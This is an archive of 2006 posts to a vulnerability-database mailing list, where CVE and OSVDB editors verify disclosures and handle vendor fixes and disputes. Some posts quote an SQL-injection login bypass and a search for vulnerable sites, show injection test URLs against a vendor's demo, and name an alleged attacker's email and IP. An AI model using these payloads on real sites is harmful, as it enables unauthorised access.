From jericho at attrition.org Wed Feb 1 05:19:19 2006 From: jericho at attrition.org (security curmudgeon) Date: Wed, 1 Feb 2006 05:19:19 -0500 (EST) Subject: [VIM] Source VERIFY of CityPost PHP Upload message parameter XSS In-Reply-To: <200601272205.k0RM5C2l013702@cairo.mitre.org> References: <200601272205.k0RM5C2l013702@cairo.mitre.org> Message-ID: : Ref: SECTRACK:103752 Ref: SECTRACK:1013749 103752 covers the LNKX XSS, which you mention in your next post. From coley at linus.mitre.org Wed Feb 1 12:24:19 2006 From: coley at linus.mitre.org (Steven M. Christey) Date: Wed, 1 Feb 2006 12:24:19 -0500 (EST) Subject: [VIM] Source VERIFY of CityPost PHP Upload message parameter XSS In-Reply-To: References: <200601272205.k0RM5C2l013702@cairo.mitre.org> Message-ID: Hmmmm, our SECTRACKs were messed up for all the CityPost issues, so thanks. On Wed, 1 Feb 2006, security curmudgeon wrote: > > : Ref: SECTRACK:103752 > > Ref: SECTRACK:1013749 > > 103752 covers the LNKX XSS, which you mention in your next post. > > From jericho at attrition.org Wed Feb 1 13:53:14 2006 From: jericho at attrition.org (security curmudgeon) Date: Wed, 1 Feb 2006 13:53:14 -0500 (EST) Subject: [VIM] MyBB search.php XSS: "sortordr" or "sorder" ? and vendor ACK In-Reply-To: <200601311733.k0VHXZmo019687@cairo.mitre.org> References: <200601311733.k0VHXZmo019687@cairo.mitre.org> Message-ID: : There also appears to be an SQL-injection related fix in global.php, but : I'm not sure where it came from - possibly a zero-day exploit. http://community.mybboard.net/showthread.php?tid=6418 As some of you saw, when these forums were attacked, there has been the discovery of another serious security exploit in MyBB. Soon after the boards were exploited, backups of the forum were restored and the discovery process began. Due to access logs being completely useless (Corrupt), I took to the code and found the potential vulnerability the attacker exploited. Interesting, the MyBB admins disclosed the attacker info: Username: dedo (They previously registered here) Email Address: o.y.6 at hotmail.com IP Address: 88.152.35.15 That email address corresponds with two Bugtraq posts: http://archives.neohapsis.com/archives/bugtraq/2006-01/0482.html MyBB 1.2 usercp2.php [ $url ] CrossSiteScripting ( XSS ) http://archives.neohapsis.com/archives/bugtraq/2006-01/0492.html MyBB 1.2 Local File Incusion So it seems these may be two of the "several other medium priority vulnerabilities recently discovered". From coley at mitre.org Thu Feb 2 00:47:46 2006 From: coley at mitre.org (Steven M. Christey) Date: Thu, 2 Feb 2006 00:47:46 -0500 (EST) Subject: [VIM] Missed vectors in SPIP SQL injection Message-ID: <200602020547.k125lkVW005434@cairo.mitre.org> Based on this disclosure: http://www.zone-h.org/en/advisories/read/id=8650/ Note how the disclosers also say: or with any other variable (id_article, id_breve..) like: Some VDBs are not mentioning id_breve. Also, some VDBs missed this: The vendor also discovered 2 potential sql injections in the session handling and when posting "petitions" (maybe others). In the interests of full disclosure, an analyst on the CVE content team *also* missed this, but we all make mistakes as is so painfully obvious every time Brian finds a CVE dupe that was my fault ;-) - Steve From coley at mitre.org Fri Feb 3 19:48:19 2006 From: coley at mitre.org (Steven M. Christey) Date: Fri, 3 Feb 2006 19:48:19 -0500 (EST) Subject: [VIM] Don't expect vendor ACK for NukedWeb Message-ID: <200602040048.k140mJc2025882@cairo.mitre.org> from the NukedWeb home page at http://nukedweb.memebot.com/ : Not to go into too much detail, but I'm going away to federal prison for a few years... Because of this, I won't be here after May 24th 2005. - Steve From jericho at attrition.org Fri Feb 3 19:51:19 2006 From: jericho at attrition.org (security curmudgeon) Date: Fri, 3 Feb 2006 19:51:19 -0500 (EST) Subject: [VIM] vendor ack/fix: 22793: CRE Loaded files.php Unauthenticated Arbitrary File Upload (fwd) Message-ID: ---------- Forwarded message ---------- From: David M. Graham To: moderators at osvdb.org Date: Fri, 03 Feb 2006 11:25:18 -0600 Subject: [OSVDB Mods] [Change Request] 22793: CRE Loaded files.php Unauthenticated Arbitrary File Upload In regards to this issue, which affects several files in the HTMLarea install in all releases of CRE Loaded 6 prior to 6.2 and including any copy of 6.15 downloaded before January 30th. We have released a patch to address this exploit. It is available at : http://creloaded.com/Downloads/d_op=getit/lid=172.html Regards, David M. Graham, CRE Loaded Project Manager Chain Reaction Works, Inc From coley at linus.mitre.org Fri Feb 3 20:33:40 2006 From: coley at linus.mitre.org (Steven M. Christey) Date: Fri, 3 Feb 2006 20:33:40 -0500 (EST) Subject: [VIM] RE : http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0478 (fwd) Message-ID: An interesting additional bit of information - a claim that the researcher reverse-engineered the patches? ---------- Forwarded message ---------- Date: Fri, 03 Feb 2006 18:59:50 -0600 From: David M. Graham To: cve at mitre.org Subject: RE : http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0478 Your CVE-2006-0478 entry is largely correct. The potential for this exploit was recognized by us approximately a month ago, and we immediately developed a patch. The initial announcement of this risk was made on our website at http://creloaded.com , and it included a patch which will close the vulnerability on all known 6.0x and 6.1x releases. Subsequently, announcements were made to several security organizations by an individual who included links to a freely available script written to take advantage of the previously publicized issue on unpatched releases. Despite multiple notifications to registered users, distribution of the patch remained low and this remains a serious threat. We strongly encourage users of CRE Loaded 6.x , osCMax, and other users of osCommerce who have installed HTMLArea based WYSIWYG editors and Admin Access with Levels to modify thier installations at the earliest possible moment. Regards, David M. Graham, CRE Loaded Project Manager Chain Reaction Works, Inc. From coley at linus.mitre.org Fri Feb 3 21:56:45 2006 From: coley at linus.mitre.org (Steven M. Christey) Date: Fri, 3 Feb 2006 21:56:45 -0500 (EST) Subject: [VIM] CVE-2006-0484 (under review) - poblem sovled (Info from Vendor) (fwd) Message-ID: guess vis.pl really *is* part of face control ;-) ---------- Forwarded message ---------- Date: Sat, 4 Feb 2006 04:53:46 +0200 From: support To: cve at mitre.org Subject: RE: CVE-2006-0484 (under review) - poblem sovled (Info from Vendor) RE: CVE-2006-0484 (under review) Directory traversal vulnerability in Vis.pl, as part of the FACE CONTROL product, allows remote attackers to read arbitrary files via a .. (dot dot) in any parameter that opens a file, such as (1) s or (2) p. The Isue was solved by our program team. All the clients are provided with proper system updates. Thank you. Face Control Program Team From coley at mitre.org Mon Feb 6 17:52:47 2006 From: coley at mitre.org (Steven M. Christey) Date: Mon, 6 Feb 2006 17:52:47 -0500 (EST) Subject: [VIM] VERIFY Pluggedout Blog 1.9.9c problem.php XSS Message-ID: <200602062252.k16Mql0o023966@cairo.mitre.org> downloaded 1.9.9c as referenced here: http://www.pluggedout.com/development/forums/viewtopic.php?t=831 I verified the XSS via source inspection. problem.php has: >switch ($_REQUEST["id"]){ ... > case "1": ... > print "Problem with Database Result Code

".$_REQUEST["data"]; No include statements appear before this code, so there is no cleansing going on. A grep shows that problem.php is only referenced in "Location:" headers from other scripts, one of which is a generic problem reporting routine; so this is probably a case of a "direct request" enabling the XSS, if anyone cares. - Steve From coley at mitre.org Mon Feb 6 18:14:25 2006 From: coley at mitre.org (Steven M. Christey) Date: Mon, 6 Feb 2006 18:14:25 -0500 (EST) Subject: [VIM] VERIFY Pluggedout Blog 1.9.9c exec.php SQL injection Message-ID: <200602062314.k16NEP29024134@cairo.mitre.org> downloaded 1.9.9c as referenced here: http://www.pluggedout.com/development/forums/viewtopic.php?t=831 I verified the SQL injection via source inspection. In database.php, $entryid in db_sql_comment_add() is not escaped: >function db_sql_comment_add($entryid,$name,$email,$url,$comment){ ... > $name = mysql_escape_string(strip_tags($name)); > $email = mysql_escape_string(strip_tags($email)); > $url = mysql_escape_string(strip_tags($url)); > $comment = mysql_escape_string(strip_tags($comment)); ... > $sql = "INSERT INTO ".$db_prefix."comments (nEntryId,cName,cEMail,cURL,cComment,dAdded)" > ." VALUES (".$entryid.",'".$name."','".$email."','".$url."','".$comment."',now())"; In exec.php: >function comment_add($entryid,$name="",$email="",$url="",$comment=""){ ... > $sql = db_sql_comment_add($entryid,$name,$email,$url,$comment); So, if we control the 1st argument to comment_add() we are set. Later in exec.php: >switch ($_GET["action"]){ > case "comment_add": > $result = comment_add($_REQUEST["entryid"],$_REQUEST["name"],$_REQUEST["email"],$_REQUEST["url"],$_REQUEST["comment"]); So we have $_REQUEST["entryid"] added unquoted into a SQL query. Note: other code in the same file seems to use $_REQUEST["entryid"] as well. - Steve From jericho at attrition.org Tue Feb 7 00:57:59 2006 From: jericho at attrition.org (security curmudgeon) Date: Tue, 7 Feb 2006 00:57:59 -0500 (EST) Subject: [VIM] jumping the gun? Message-ID: http://www.secunia.com/advisories/18740/ Release Date: 2006-02-06 Reference: http://users.pandora.be/bratax/advisories/b008.html Release Date: February 10 2006 From coley at mitre.org Wed Feb 8 20:12:37 2006 From: coley at mitre.org (Steven M. Christey) Date: Wed, 8 Feb 2006 20:12:37 -0500 (EST) Subject: [VIM] CVE-2005-4003 - ASPS - description identifies wrong bug type Message-ID: <200602090112.k191CbpJ025841@cairo.mitre.org> Regarding CVE-2005-4003. This arose from a r0t blog entry that clearly identified XSS. However, the CVE description says SQL injection. Stupid description templates! ;-) Some VDBs have mentioned both XSS and SQL injection as vectors. While the issue smells like it could be both (e.g. SQL injection enabling XSS in error messages), it could be that these VDBs mentioned the SQL injection due to CVE's mistaken description. The only original source information I have is XSS. If anybody has any information on whether the SQL injection issues really exist, let me know. Right now I have a pretty ugly-looking candidate on my hands :) - Steve ====================================================== Name: CVE-2005-4003 Status: Candidate URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4003 Reference: MISC:http://pridels.blogspot.com/2005/12/asps-shopping-cart-professional-and.html Reference: BID:15694 Reference: URL:http://www.securityfocus.com/bid/15694 Multiple SQL injection vulnerabilities in Absolute Shopping Package Solutions (ASPS) Shopping Cart Professional 2.9d and earlier, and Lite 2.1 and earlier, allow remote attackers to execute arbitrary SQL commands via the (1) srch_product_name parameter to adv_search.asp and (2) b_search parameter to bsearch.asp. NOTE: the original disclosure was specifically only for an XSS issue, but the CVE description was for SQL injection. Since the original disclosure, SQL injection vectors have been reported. This CVE might be REJECTed or significantly altered pending additional information. From jericho at attrition.org Thu Feb 9 02:40:13 2006 From: jericho at attrition.org (security curmudgeon) Date: Thu, 9 Feb 2006 02:40:13 -0500 (EST) Subject: [VIM] 22793: CRE Loaded files.php Unauthenticated Arbitrary File Upload (fwd) Message-ID: I have updated OSVDB 22793 to reflect all of this. ---------- Forwarded message ---------- From: David M. Graham To: security curmudgeon Cc: moderators at osvdb.org Date: Sat, 04 Feb 2006 10:16:21 -0600 Subject: Re: [OSVDB Mods] [Change Request] 22793: CRE Loaded files.php Unauthenticated Arbitrary File Upload Brian, HTMLarea is a product of dynarch.com and interactivetools.com . It is available under a BSD type license and is widely used in Open Source web projects. http://www.dynarch.com/projects/htmlarea/ is the product page, and should give more information. Various releases of CRE Loaded have used both HTMLArea 1.7 and 2.03. HTMLArea is now nearing release 3.x. with 3.0 rc2 being available at the time of this writing. I do not know if 3.x will address this issue. Generally it appears that security is left to the integrator, and we apparently missed 4 files. Regards, David security curmudgeon wrote: > : 6.02 Beta , 6.042 (all patch levels), 6.1 , and 6.15 . > : : The forthcoming 6.2 release does not use HTMLarea and does not include : > this vulnerability. > > Excellent, I will mention that 6.2 is a viable upgrade to fix the issue as > well. > > : Further, it is important to note that this issue may affect not only CRE : > Loaded osCommerce, but any osCommerce variant which uses HTMLArea with : or > without the Admin Access with Levels contribution. > > Is HTMLArea a seperate 'product' (freeware maybe?) that is incorpoated into > CRE Loaded? If so, do you have more info on that product, as our listing > would be changed to reflect that as the vulnerability, and CRE Loaded > affected. > > Brian > > From jericho at attrition.org Thu Feb 9 02:51:10 2006 From: jericho at attrition.org (security curmudgeon) Date: Thu, 9 Feb 2006 02:51:10 -0500 (EST) Subject: [VIM] ASP Survey - confusion and provenance Message-ID: http://cve.mitre.org/cgi-bin/cvename.cgi?name=2006-0192 SQL injection vulnerability in Login_Validate.asp in ASPSurvey 1.10 allows remote attackers to execute arbitrary SQL commands via the Password parameter. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information. So we have Login_Validate.asp via unknown sources, and login.asp from this bugtraq post? Vendor URL: http://asp.loftin-nc.com/ASPSurvey/ Demo URL: http://asp.loftin-nc.com/ASPSurvey/Demo/Admin/Login.asp Thoughts? ---------- Forwarded message ---------- From: mfoxhacker at gmail.com To: bugtraq at securityfocus.com Date: 4 Feb 2006 13:25:55 -0000 Subject: sql injection in ASP Survey Hi guys there is a simple sql injection in web app. (ASP Survey) by this vuln. you can go into the admin page Target Page : login.asp Vendor : ASP Survey Exploit : User: admin Password: 'or' Hacking: 1. search on google.com as : allinurl:"login.asp" ASPsurvey and then type the Exploit in correct order... and Enjoy the admin CP. From coley at linus.mitre.org Thu Feb 9 12:16:48 2006 From: coley at linus.mitre.org (Steven M. Christey) Date: Thu, 9 Feb 2006 12:16:48 -0500 (EST) Subject: [VIM] ASP Survey - confusion and provenance In-Reply-To: References: Message-ID: On Thu, 9 Feb 2006, security curmudgeon wrote: > http://cve.mitre.org/cgi-bin/cvename.cgi?name=2006-0192 > > SQL injection vulnerability in Login_Validate.asp in ASPSurvey 1.10 allows > remote attackers to execute arbitrary SQL commands via the Password > parameter. NOTE: the provenance of this information is unknown; the > details are obtained solely from third party information. > > So we have Login_Validate.asp via unknown sources, and login.asp from this > bugtraq post? Just yesterday, a CVE analyst was analyzing references to add to this. He looked at HTML source of the demo site and saw that login.asp called Login_Validate.asp, so I modified the description accordingly; see below. - Steve ====================================================== Name: CVE-2006-0192 Status: Candidate URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0192 Announced: 20060112 Flaw: sql-inject Reference: BUGTRAQ:20060204 sql injection in ASP Survey Reference: URL:http://www.securityfocus.com/archive/1/archive/1/423949/100/0/threaded Reference: FRSIRT:ADV-2006-0164 Reference: URL:http://www.frsirt.com/english/advisories/2006/0164 Reference: OSVDB:22342 Reference: URL:http://www.osvdb.org/22342 Reference: SECUNIA:18422 Reference: URL:http://secunia.com/advisories/18422 Reference: XF:aspsurvey-loginvalidate-sql-injection(24087) Reference: URL:http://xforce.iss.net/xforce/xfdb/24087 SQL injection vulnerability in Login_Validate.asp in ASPSurvey 1.10 allows remote attackers to execute arbitrary SQL commands via the Password parameter to login.asp. Analysis: ACCURACY: Through html source verification [Heinbockel], the login.asp page forms use the Login_Validate.asp script. From coley at linus.mitre.org Thu Feb 9 23:56:11 2006 From: coley at linus.mitre.org (Steven M. Christey) Date: Thu, 9 Feb 2006 23:56:11 -0500 (EST) Subject: [VIM] Vendor ACK for MyQuiz Message-ID: alex at evuln said vendor fixed, but the acknowledgement was too vague, so I double-checked with the vendor. vendor responded within minutes of my initial request. - Steve ---------- Forwarded message ---------- Date: Thu, 09 Feb 2006 22:48:20 -0600 From: Dale Ray To: coley at mitre.org Subject: Re: Security vulnerability in MyQuiz To the best of my knowledge YES the issue is fixed. I did this using whitelist data entry testing. If any character that is not valid input is in the URL calling the script the script aborts with an error message. But - the only way for you to be sure of this is for you to test the script yourself. You should never trust anything you download from the internet. *********** START QUOTE *********** > On 2/9/2006 at 11:34 PM coley at mitre.org wrote: >Somebody claiming to be Steve Christey wrote: > >I am a computer security professional for the CVE project, which is >sponsored by the Department of Homeland Security to assign standard >identifiers for security vulnerabilities (http://www.us-cert.gov/cve/, >http://cve.mitre.org/) > >Recently, some security vulnerability information about your product >was posted here: > > http://www.evuln.com/vulns/57/summary.html > >The researcher says that you fixed the issue in version 2.0, but your >acknowledgement does not provide enough details to be sure that you are >fixing the vulnerability identified above. > >So... did 2.0 fix the issue above? > >Thank you, >Steve Christey >Principal Information Security Engineer >CVE Editor >The MITRE Corporation *********** END QUOTE *********** From coley at mitre.org Fri Feb 10 00:15:32 2006 From: coley at mitre.org (Steven M. Christey) Date: Fri, 10 Feb 2006 00:15:32 -0500 (EST) Subject: [VIM] context-dependent attackers Message-ID: <200602100515.k1A5FW2D006093@cairo.mitre.org> FYI, in cases like the recent integer overflows in compilers handling the "i>sizeof(int)" expression, you can't know ahead of time whether the affected applications are locally or remotely exploitable. I've started using the phrase "context-dependent" to handle these cases. Libraries are also likely to have context-dependent attack vectors. - Steve From jericho at attrition.org Fri Feb 10 02:59:36 2006 From: jericho at attrition.org (security curmudgeon) Date: Fri, 10 Feb 2006 02:59:36 -0500 (EST) Subject: [VIM] vendor ack/fix: Enhanced Simple PHP Gallery index.php dir Variable XSS (fwd) Message-ID: ---------- Forwarded message ---------- From: Rich Pedley To: moderators at osvdb.org Date: Tue, 07 Feb 2006 16:17:29 +0000 Subject: [OSVDB Mods] [Change Request] 22201: Enhanced Simple PHP Gallery index.php dir Variable XSS Hi all, I have released a new version to hopefully tackle this issue. http://www.quirm.net/page.php?id=6 Rich Pedley From jericho at attrition.org Fri Feb 10 21:16:21 2006 From: jericho at attrition.org (security curmudgeon) Date: Fri, 10 Feb 2006 21:16:21 -0500 (EST) Subject: [VIM] vendor dispute: 20481: PHP Handicapper process_signup.php serviceid Variable SQL Injection (fwd) Message-ID: ---------- Forwarded message ---------- From: Web Design WRKG To: moderators at osvdb.org Date: Fri, 10 Feb 2006 17:21:15 -0800 Subject: [OSVDB Mods] [Change Request] 20481: PHP Handicapper process_signup.php serviceid Variable SQL Injection I own the software in question and this is 100% false reporting, this is a slander campaign from a customer who had a vulnerability in his SERVER not the software, and was running another script in which emails were bouncing, From jericho at attrition.org Fri Feb 10 21:26:06 2006 From: jericho at attrition.org (security curmudgeon) Date: Fri, 10 Feb 2006 21:26:06 -0500 (EST) Subject: [VIM] 20481: PHP Handicapper process_signup.php serviceid Variable SQL Injection (fwd) Message-ID: ---------- Forwarded message ---------- From: security curmudgeon To: Web Design WRKG Cc: moderators at osvdb.org Date: Fri, 10 Feb 2006 21:25:37 -0500 (EST) Subject: Re: [OSVDB Mods] [Change Request] 20481: PHP Handicapper process_signup.php serviceid Variable SQL Injection Hello, : I own the software in question and this is 100% false reporting, this is : a slander campaign from a customer who had a vulnerability in his SERVER : not the software, and was running another script in which emails were : bouncing, This issue appears to have originally been disclosed to Secunia [1]. They cite "BiPi_HaCk, Nightmare TeAmZ" as the person who shared the information with them, and found the vulnerability. Are you saying that 'BiPi_HaCk' is the customer attempting to slander you? Since you have a demo available, I went to the following URL to see if the file in question existed: http://www.phphandicapper.com/demos/1front/source/process_signup.php This URL yields the following error: Warning: mysql_result(): supplied argument is not a valid MySQL result resource in /home/hand/public_html/demos/1front/source/process_signup.php on line 20 You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near ','paypal')' at line 1 This warning is likely why someone thought the script was vulnerable to SQL injection. The error message is one indication that it may be, but no proof by any means. As you can see though, it also discloses the full path of the installation which is a seperate issue. Brian OSVDB.org From coley at linus.mitre.org Fri Feb 10 21:44:07 2006 From: coley at linus.mitre.org (Steven M. Christey) Date: Fri, 10 Feb 2006 21:44:07 -0500 (EST) Subject: [VIM] vendor dispute: 20481: PHP Handicapper process_signup.php serviceid Variable SQL Injection (fwd) In-Reply-To: References: Message-ID: *sigh* It is at least 67% true reporting. Why do we seem to get complaints on Friday? :) SQL injection - or at least forced invalid SQL - is here, with path disclosure: http://www.phphandicapper.com/demos/1front/source/process_signup.php?serviceid=' This yields the error: Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource And here's an XSS vector as identified in Secunia 17412. http://www.phphandicapper.com/demos/1front/source/msg.php?msg= Oh - for those VDBs with provenance problems, here is the original BiPi_Hack advisory: http://www.zone-h.org/advisories/read/id=8360 NOTE - the original reference implies that the process_signup.php login parameter vector is CRLF injection, *not* XSS. - Steve On Fri, 10 Feb 2006, security curmudgeon wrote: > > > ---------- Forwarded message ---------- > From: Web Design WRKG > To: moderators at osvdb.org > Date: Fri, 10 Feb 2006 17:21:15 -0800 > Subject: [OSVDB Mods] [Change Request] 20481: PHP Handicapper process_signup.php > serviceid Variable SQL Injection > > I own the software in question and this is 100% false reporting, this is a > slander campaign from a customer who had a vulnerability in his SERVER not > the software, and was running another script in which emails were > bouncing, > From jericho at attrition.org Fri Feb 10 22:18:17 2006 From: jericho at attrition.org (security curmudgeon) Date: Fri, 10 Feb 2006 22:18:17 -0500 (EST) Subject: [VIM] CVE-2005-4003 - ASPS - description identifies wrong bug type In-Reply-To: <200602090112.k191CbpJ025841@cairo.mitre.org> References: <200602090112.k191CbpJ025841@cairo.mitre.org> Message-ID: : Some VDBs have mentioned both XSS and SQL injection as vectors. While : the issue smells like it could be both (e.g. SQL injection enabling XSS : in error messages), it could be that these VDBs mentioned the SQL : injection due to CVE's mistaken description. The only original source : information I have is XSS. : : ====================================================== : Name: CVE-2005-4003 : Status: Candidate : URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4003 : Reference: MISC:http://pridels.blogspot.com/2005/12/asps-shopping-cart-professional-and.html : Reference: BID:15694 : Reference: URL:http://www.securityfocus.com/bid/15694 The blog has no mention of SQL still, and BID covers XSS. Know off hand which VDBs picked up or reported the SQL issue? From coley at mitre.org Mon Feb 13 01:47:27 2006 From: coley at mitre.org (Steven M. Christey) Date: Mon, 13 Feb 2006 01:47:27 -0500 (EST) Subject: [VIM] "does not do X" versus "does not properly do X" Message-ID: <200602130647.k1D6lRwS023756@faron.mitre.org> All, As developers have attempted to perform input validation, the number of errors in input validation is increasing. The incomplete blacklist problem I wrote about a couple weeks ago was one example. I think it's useful/important to make distinctions between when someone *tries* to implement a protection scheme, versus when there *is no* protection scheme. CVE description style has evolved slightly because of that. If a product tries to do X, but fails, then we say it "does not properly" do X. If a product does not even TRY do do X, then we say it "does not" do X. Example: http://lkml.org/lkml/2005/12/23/171 The vendor says "We must check for MAY_SATTR before setting acls, which includes checking for read-only exports: the lower-level setxattr operation that eventually sets the acl cannot check export-level restrictions." It doesn't say that they check for "MAY_SATTR" in some weird broken way; they simply don't do it. And you can confirm this by looking at their patch. Therefore the CVE desc for this would say something like "Product does not check for MAY_SATTR..." === Now look at this issue: http://www.kapda.ir/advisory-231.html The issue is related to a count value for the number of pings to send. The researcher says: "the scripts only allows you to send 10 or 4 pings... Maximum for count is: 10" But then the researcher says: "You can bypass the ping count restriction by just making the count value negative." So here, the product TRIES to check the number of pings, but it screws up a little bit. So, the CVE desc is "product DOES NOT PROPERLY verify the number of pings..." - Steve From mattmurphy at kc.rr.com Tue Feb 14 00:39:55 2006 From: mattmurphy at kc.rr.com (Matthew Murphy) Date: Mon, 13 Feb 2006 23:39:55 -0600 Subject: [VIM] [Full-disclosure] Advisory: Internet Explorer Drag and Drop Redeux [CVE-2005-3240] (fwd) In-Reply-To: References: <43F126FD.7080505@kc.rr.com> <43F1286E.9030902@kc.rr.com> Message-ID: <43F16D2B.7090408@kc.rr.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: RIPEMD160 security curmudgeon wrote: > OSVDB 2707 is public now, thanks! > > we're still holding OSVDB 536 for you. My screw-ups on this one (like not sending the *revised* version of the advisory to the lists) have really made things complicated. I'd recommend linking to SecuriTeam rather than my mailing list post (which now contains some known accuracy problems). That link is: http://www.securiteam.com/windowsntfocus/5MP0B0UHPA.html It presently contains the broken CVE/Bugtraq links but should be getting an update soon to fix that. Should any *other* issues emerge, that advisory will also be updated. As many things as I f---ed up on this release, I wouldn't be surprised if there are more updates. Pardon my scatter-brainedness. Lesson learned: don't try to release an advisory when you've been seriously short of sleep. - -- "Social Darwinism: Try to make something idiot-proof, nature will provide you with a better idiot." -- Michael Holstein -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.2 (MingW32) Comment: http://pgp.mit.edu:11371/pks/lookup?op=get&search=0xB5444D38 iD8DBQFD8W0rfp4vUrVETTgRA1aLAKC+xFCzed65Kh4uL1VtLpAsmCH5DgCgyT25 QVn+d5wE/xDqQEzqE9mYJRI= =rkz2 -----END PGP SIGNATURE----- -------------- next part -------------- A non-text attachment was scrubbed... Name: smime.p7s Type: application/x-pkcs7-signature Size: 3436 bytes Desc: S/MIME Cryptographic Signature Url : http://www.attrition.org/pipermail/vim/attachments/20060214/7df58715/attachment-0001.bin From jericho at attrition.org Tue Feb 14 00:39:16 2006 From: jericho at attrition.org (security curmudgeon) Date: Tue, 14 Feb 2006 00:39:16 -0500 (EST) Subject: [VIM] Advisory: Internet Explorer Drag and Drop Redeux [CVE-2005-3240] (fwd) In-Reply-To: <43F16D2B.7090408@kc.rr.com> References: <43F126FD.7080505@kc.rr.com> <43F1286E.9030902@kc.rr.com> <43F16D2B.7090408@kc.rr.com> Message-ID: : > OSVDB 2707 is public now, thanks! : > : > we're still holding OSVDB 536 for you. : : My screw-ups on this one (like not sending the *revised* version of the : advisory to the lists) have really made things complicated. I'd : recommend linking to SecuriTeam rather than my mailing list post (which : now contains some known accuracy problems). : : That link is: http://www.securiteam.com/windowsntfocus/5MP0B0UHPA.html I've added this to OSVDB 2707. : It presently contains the broken CVE/Bugtraq links but should be getting : an update soon to fix that. Should any *other* issues emerge, that : advisory will also be updated. I will add the bad CVE/BID numbers down the road, but for now leaving them off to avoid confusion. From coley at linus.mitre.org Tue Feb 14 01:24:56 2006 From: coley at linus.mitre.org (Steven M. Christey) Date: Tue, 14 Feb 2006 01:24:56 -0500 (EST) Subject: [VIM] [Full-disclosure] Advisory: Internet Explorer Drag and Drop Redeux [CVE-2005-3240] (fwd) In-Reply-To: <43F16D2B.7090408@kc.rr.com> References: <43F126FD.7080505@kc.rr.com> <43F1286E.9030902@kc.rr.com> <43F16D2B.7090408@kc.rr.com> Message-ID: I'll be fixing up the CVE's and making sure it's on the public site very shortly. The Omnistar Live issue at CVE-2005-3840 will certainly get some more attention now, though ;-) - Steve From jericho at attrition.org Tue Feb 14 18:58:32 2006 From: jericho at attrition.org (security curmudgeon) Date: Tue, 14 Feb 2006 18:58:32 -0500 (EST) Subject: [VIM] vendor ack/fix 22243: Modular Merchant Marketplace Shopping Cart category.php cat Variable XSS (fwd) Message-ID: ---------- Forwarded message ---------- From: Sherri Marier To: moderators at osvdb.org Date: Tue, 14 Feb 2006 13:25:33 -0800 Subject: [OSVDB Mods] [Change Request] 22243: Modular Merchant Marketplace Shopping Cart category.php cat Variable XSS Hello, Please note that as of 02/03/06 this issue has been corrected with update version 2.017. Please update your database with this new information in the solution section accordingly. The forum post with detailed information can be found below. http://www.modularmerchant.com/forums/viewtopic.php?t=46 Sherri Marier www.ModularMerchant.com From jericho at attrition.org Wed Feb 15 08:48:38 2006 From: jericho at attrition.org (security curmudgeon) Date: Wed, 15 Feb 2006 08:48:38 -0500 (EST) Subject: [VIM] EV0074 BirthSys 3.1 SQL injection (fwd) Message-ID: One of our manglers discovered a small error in a recent evuln.com disclosure. Apparently 'date.php' is really 'date.php3'. I encouraged him to contact evuln.com with this information. ---------- Forwarded message ---------- From: Josh Zlatin To: support at evuln.com Date: Wed, 15 Feb 2006 08:50:10 -0500 (EST) Subject: EV0074 BirthSys 3.1 SQL injection I wanted to clarify the SQL injection in the data.php3 file in BirthSys 3.1 that you reported. I was unable to recreate the SQL injection via either the 'date' or 'month' variables as both are those are set in the date.php3 code itself: Quoted from BirthSys data.php3: $date = date( "d" ); $month=("$monthName[$currentMonth]"); The only SQL query in that script is: $result = mysql_query("SELECT * FROM birthsys WHERE month= $month AND day= $date"); so am I missing something or is this a mistake? Thanks, -- - Josh From coley at mitre.org Wed Feb 15 23:50:37 2006 From: coley at mitre.org (Steven M. Christey) Date: Wed, 15 Feb 2006 23:50:37 -0500 (EST) Subject: [VIM] DF MSAnalysis SQL injection in CPG-Nuke Dragonfly CMS 9.0.6.1 Message-ID: <200602160450.k1G4ob0P014020@faron.mitre.org> While researching the linking.php Dragonfly issue, I fell down the rabbit hole and found this gem of a forum post: http://dragonflycms.org/Forums/viewtopic/t=14751.html It deals with a victim of a hack attempt (previously not public?), with lots of error messages. Besides getting into the details of the linking.php issue, an SQL injection problem also appears to exist in a module called "DF MSAnalysis" which is some port of a product called "MSAnalysis", but for Dragonfly products. This appears to be a third party module, not something maintained by CPG-Nuke. URL is http://www.musox.com/index.php This is a nice example for how XSS manipulations can expose SQL injection issues. (I'm calling it SQL injection but it someone thinks it's just path disclosure and no more, definitely let me know :) Check followup forum posts from musox and DJMaze. Note clear if musox is aware that the issue is in his/her product; I'll try to send an email. - Steve From coley at mitre.org Thu Feb 16 01:26:00 2006 From: coley at mitre.org (Steven M. Christey) Date: Thu, 16 Feb 2006 01:26:00 -0500 (EST) Subject: [VIM] Recent HP advisories outline BIND problems Message-ID: <200602160626.k1G6Q0c5015080@faron.mitre.org> An update to an HP advisory provided more details on the issue, where they originally had been extremely vague. It quotes the ISC web page as saying: "BIND4/BIND8 Unsuitable for Forwarder Use... If a nameserver -- any nameservEr, whether BIND or otherwise -- is configured to use 'forwarders', then none of the target forwarders can be running BIND4 or BIND8. Upgrade all nameservers used as 'forwarders' to BIND9. There is a current, wide scale Kashpureff-style DNS cache corruption attack which depends on BIND4 and BIND8 as 'forwarders' targets." This turns out to be related to some series of attacks that took place in April 2005 and further exposed by Dan Kaminsky in August: http://computerworld.com/networkingtopics/networking/story/0,10801,103744,00.html So it's been publicly known for a while. Just FYI in case I'm not the only person who missed all this when it first happened ;-) - Steve From jericho at attrition.org Fri Feb 17 00:51:54 2006 From: jericho at attrition.org (security curmudgeon) Date: Fri, 17 Feb 2006 00:51:54 -0500 (EST) Subject: [VIM] fake vulnerability extortion? Message-ID: http://archives.neohapsis.com/archives/bugtraq/2006-02/0086.html Hi everyone! the January 23 me was done work on revealing the criticality in forum vBulltin(3.0.7 - 3.5.3) and IPB(2.0.0 - 2.1.4). ------------------------------------------------------------------------- The Criticality were find nearly similar nature. Later I have tested them on rest version and they have in the same way operated. After two three days were written two exploits under these two forums. Eksploit allows to get web - shell on server where is installed forum. So much for that I can say on this cause. Letter this has wrote therefor that developers of these programme products knew that in them there are mistakes for attention. http://archives.neohapsis.com/archives/bugtraq/2006-02/0103.html > No, 